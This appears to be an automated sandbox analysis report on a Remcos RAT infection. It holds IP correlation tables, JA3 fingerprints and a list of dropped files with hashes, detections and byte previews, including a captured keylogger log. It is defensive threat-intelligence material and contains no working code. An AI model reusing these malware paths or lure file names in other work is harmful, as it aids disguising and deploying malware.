                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.107.246.69
                                                                                                                                                              Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.107.213.69
                                                                                                                                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 40.67.232.186
                                                                                                                                                              OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.208.16.94
                                                                                                                                                              SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                              • 13.107.213.69
                                                                                                                                                              https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 13.107.213.69
                                                                                                                                                              https://uqgekpc20qn1.azureedge.net/6466/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                              • 13.107.213.69
                                                                                                                                                              ATOM86-ASATOM86NLfu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              NXGNET-AS-APNextgenNetworksAUHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.198.26.173
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.198.26.173
                                                                                                                                                              2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.198.26.25
                                                                                                                                                              Quotationfor4220197476pdf.bat.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.198.26.210
                                                                                                                                                              9BwUsuGgIa.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 150.207.89.103
                                                                                                                                                              jklarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 150.207.104.0
                                                                                                                                                              9pbDW7cdoz.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 150.207.224.9
                                                                                                                                                              tZ6XNvMqPp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 150.207.104.1
                                                                                                                                                              RTO4RFAjHZGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 203.28.63.2
                                                                                                                                                              owAMRukkmM.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                              • 150.207.96.50
                                                                                                                                                              AARNET-AS-APAustralianAcademicandResearchNetworkAARNefu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.186.117.142
                                                                                                                                                              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.186.117.142
                                                                                                                                                              1mHUcsxKG6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 103.183.144.35
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.186.117.142
                                                                                                                                                              W5xi2iuufC.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 103.169.166.27
                                                                                                                                                              jdsfl.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 134.115.167.10
                                                                                                                                                              jdsfl.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 150.203.163.71
                                                                                                                                                              SocUwyIjOh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 157.85.230.5
                                                                                                                                                              tajma.arm7-20240421-1854.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                              • 103.174.73.190
                                                                                                                                                              tajma.x86-20240421-1853.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                              • 103.174.73.190

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              05af1f5ca1b87cc9cc9b25185115607dxF3wienia PO2102559-1.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              New order-Docs0374.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 13.107.137.11

                                                                                                                                                              Dropped Files

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Users\Public\Libraries\easinvoker.exefu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                  HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                    payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                      VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                        SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                          Purchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                            Quotation 20242204.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                              pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\ProgramData\Remcos\remcos.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                                                  Entropy (8bit):7.422823450789437
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
                                                                                                                                                                                  MD5:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  SHA1:0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
                                                                                                                                                                                  SHA-256:9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
                                                                                                                                                                                  SHA-512:617145481218AEBE78CED75205763DB5874D766EBD70AA9C854826DCD2353F5B179E847E858FF169C8503675F7297C477BA99141C6CACB6ABFF8CD40FE6834FA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                                                                                                                  C:\ProgramData\fggrt\logs.dat

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1170
                                                                                                                                                                                  Entropy (8bit):3.503992165114182
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:6lQoecFb5SpEde5OyZWFe5fymydIMDce5uyLe5BWUykgWtN25MMykykgM:6OlcpYEiOUWqfV2IM1upBWUJht/MykJJ
                                                                                                                                                                                  MD5:EDD9D40DD572E28A5C40835F7D091BD7
                                                                                                                                                                                  SHA1:1889F194AF5188E474905B2F19B136B8A6D53585
                                                                                                                                                                                  SHA-256:E068D4180AE039C70FFC2D070B5443DD4530C612D164B7DB324A8361B234B4FF
                                                                                                                                                                                  SHA-512:F5AA6FC539CE8FE0AF7F2EAE8C16CBFE2AD90155C431AD8FC031370DD92E205DA6E94A6B9ED2A1DE4FBB4557FC522B0C32F998C8705E5D4242F838E5A7840369
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\fggrt\logs.dat, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:....[.2.0.2.4./.0.4./.2.4. .0.7.:.4.2.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.R.e.m.c.o.s.\.r.e.m.c.o.s...e.x.e.].....[.W.i.n.].r.....[.R.u.n.].........[.O.K.h.C.y.J.6.1.9.J. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.O.K.h.C.y.J.6.1.9.J. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.O.K.h.C.y.J.6.1.9.J. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d. .(.N.o.t. .R.e.s.p.o.n.d.i.n.g.).].....[.W.i.n.].r.....[.R.u.n.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                                                  Entropy (8bit):7.422823450789437
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
                                                                                                                                                                                  MD5:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  SHA1:0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
                                                                                                                                                                                  SHA-256:9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
                                                                                                                                                                                  SHA-512:617145481218AEBE78CED75205763DB5874D766EBD70AA9C854826DCD2353F5B179E847E858FF169C8503675F7297C477BA99141C6CACB6ABFF8CD40FE6834FA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):965
                                                                                                                                                                                  Entropy (8bit):5.004832253615082
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:tkbOnd6CsGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkwn:qbCdRNuKyGX85jrvXhNlT3/7sYDsro
                                                                                                                                                                                  MD5:C73B159871D7780F018E99406AD5AF76
                                                                                                                                                                                  SHA1:5270DB444A46AB3CBAE1753308FED10CAFDD6F80
                                                                                                                                                                                  SHA-256:453DB0468A2C6F5EEDC35565E202913D388A52D300BDF82C8995EFA4BCC9BECA
                                                                                                                                                                                  SHA-512:BEC715180705256A692978960027E09476D42001D7BDD7E4B8EAF6B4074DD484FA143E7629BCF80A825745A24978BF97E82AB7A143AC4BD54E7CA01DE4117D7C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{129D962A-5FC6-4BE0-AE16-F065D9439DFB}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                                                                  SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                                                                  SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                                                                  SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{394B02A8-4B26-437D-917E-451A70C83A85}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14848
                                                                                                                                                                                  Entropy (8bit):3.6155471059584294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:xDokOaZAMEQ94ha+X7wwPeDH9wUorClneiNJExTz7C2l:bLZAMEA+X7/WdS0fJoTzl
                                                                                                                                                                                  MD5:88386CD9E713B7AE92C1A9F762478255
                                                                                                                                                                                  SHA1:7460E9E86FC8A46D9A1C2D0362558400E3C73A44
                                                                                                                                                                                  SHA-256:56979C88620DC782A116EE26CFA0FDA66D3BDD8295FCC32410CBD23194E3C7AD
                                                                                                                                                                                  SHA-512:6D02C26DC769E80E21D06C2E5BC545200015B2EE95443F1703624687558019B6E24E14CA9422831CB1949E29AF92A95479C8CC3DA4ED7BC10CA0170F78A7E7DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..0.0.8.8.1.2.5.0.).;.*...%.4.@.2.,._...!.)...>.~.2.].9.;./.[.@.?.[.&.0.[.|.?..._.$.%./.^.<.0.^.1.2.%.?.&.+.^...8.8./.).?...~.^.].!.?.?.:.-.7.^.8._.?.(.8.(._.~.[.-.[.+.4.^.=.3.`.?.8.%.2.<.?.-.7.!.>.9.[.2.0.).<.5.^.3.?...*.?.~...;.?...5.&.^.(.-.?.1.-.(.,./.6.5.<.:.?.(.;.8.%.].5.@.:.,.8.&.:.`.@.#.&.).].2.?.4.?...1.>.~.<.).$.)./.7.8.?.-._.2.0.>.#.|.].$.9.4.:.-.^.:.'...9.].~.|.@._.).4./...+...^.%.6.;.6.^...?.`.(...%.?...9.7.9...?.7...<.?.[.?.4.7.8.9.$.6.5.|.=.[.+.;.[.!.&.=.+.7./.[.<.?.7.^.$.`.%...(.3.!.,.:.~.%.<.=.6.@.%.?.?.6.;.1.%...!./.5.=.?.>./.^.'.!...=...#.3.&.7._.>.?...7.?.?.=.%.?.%.3.&.0.?.=.*.$.`.;./...1.?...0.?.|.?.(.<.6.^.`...|._.:.+.3.1.?.~.4.?.+.....&.!.).;.?.0.<.%.$.3.].;.?.8.|.$.?.3.?.5.4.8.@.+./.7.!.:.2.-.].*.>.2.$...=.$.?.2.9._.*.$./.'.-.?.4...<.7.5.(.!.1./.#.-.9.7.;.-.'.3.!.3...-.].;.+.?.0.!.]...5.&.].+.).#.1...@.?.#.$.).<.4.<./.=.&.&.5.,...1.;.7.?.&.$.(.?.-.!.?.1.8.0.|.`.`.2.4.!.(./.?.3.(.~.6.?...~.2.%.%.!.%.0.:.>.4.%._.5.?._...4.$...(.7.%.^.%.9.%.2./.,.?.+.8.?.[.8.|.0.!.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB72E720-F3E3-45DA-ADEC-6B3AF7E8AA01}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhv1FE0.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0da30b1b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                  Entropy (8bit):1.1395879474792583
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:XO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:XOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                  MD5:B2A18BAED47719EA41AF3EC88421D208
                                                                                                                                                                                  SHA1:2B12015B3DAD3467CE2DE6FEA50C208167D18259
                                                                                                                                                                                  SHA-256:2263BC7DC3BB0619C9DCCC528D81E89FA4A0C01B9B43D7A581B3831CDE18D599
                                                                                                                                                                                  SHA-512:AB60181AF0884024D8C0B9D75AF461FD8DB79F54EDAD5FC616D53DB9036F93ABC88BFF2DA145ED2B20B0B4596B5048D44E5BFEF5912C60E8D921AF389B43021E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....... ........................u..............................;:...{..4)...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhvF6ED.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0da30b1b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21037056
                                                                                                                                                                                  Entropy (8bit):1.1390581873112275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:FO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:FOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                  MD5:F73576E0773FD7C04D69E507DCE84DEE
                                                                                                                                                                                  SHA1:577EC1A8B8255C385B598A09204D4D09059A3A95
                                                                                                                                                                                  SHA-256:7EB819F68E81F1DC08AA45B76D704570D4FED62890E3E8937863C6E0F0B18E73
                                                                                                                                                                                  SHA-512:C50A1AB24E629D68A86782C7FA0E1AE1D8FC3A35BA1CE35E4BE75C2191D21F462752D92B68035F2A65B542187779E910AC5F0AD2AECD505AD06E9ABBBD44D2C6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....... ........................u..............................;:...{..4)...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\OKhCyJ619J.LNK

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Wed Apr 24 04:41:49 2024, length=65610, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1014
                                                                                                                                                                                  Entropy (8bit):4.517726684212363
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:8JxtXsFgXg/XAlCPCHaX6zBJLYgB/J89rX+WqblV6wJlNQOicvbJ48eDtZ3YilMH:8J7Y/XTqzDsgc9mEteJeDv3qmk7N
                                                                                                                                                                                  MD5:645CBF050467E2BF17E098A54345AAD6
                                                                                                                                                                                  SHA1:C3B6234E5FCB50ABBDFD4470057373C966249DC7
                                                                                                                                                                                  SHA-256:D48AB989FF7C61E1CEBA087E3F2AAF48C686584CA0488AAA34404026C0CE3069
                                                                                                                                                                                  SHA-512:74660E3416A4C744B0D422F441B264439C561E6BD876D9253BD74648073C9FD4C3A0739363C2B2C34E4C2D51F97DD20169A4F391B33BCC82D925B9E246FB41A1
                                                                                                                                                                                  Malicious:false
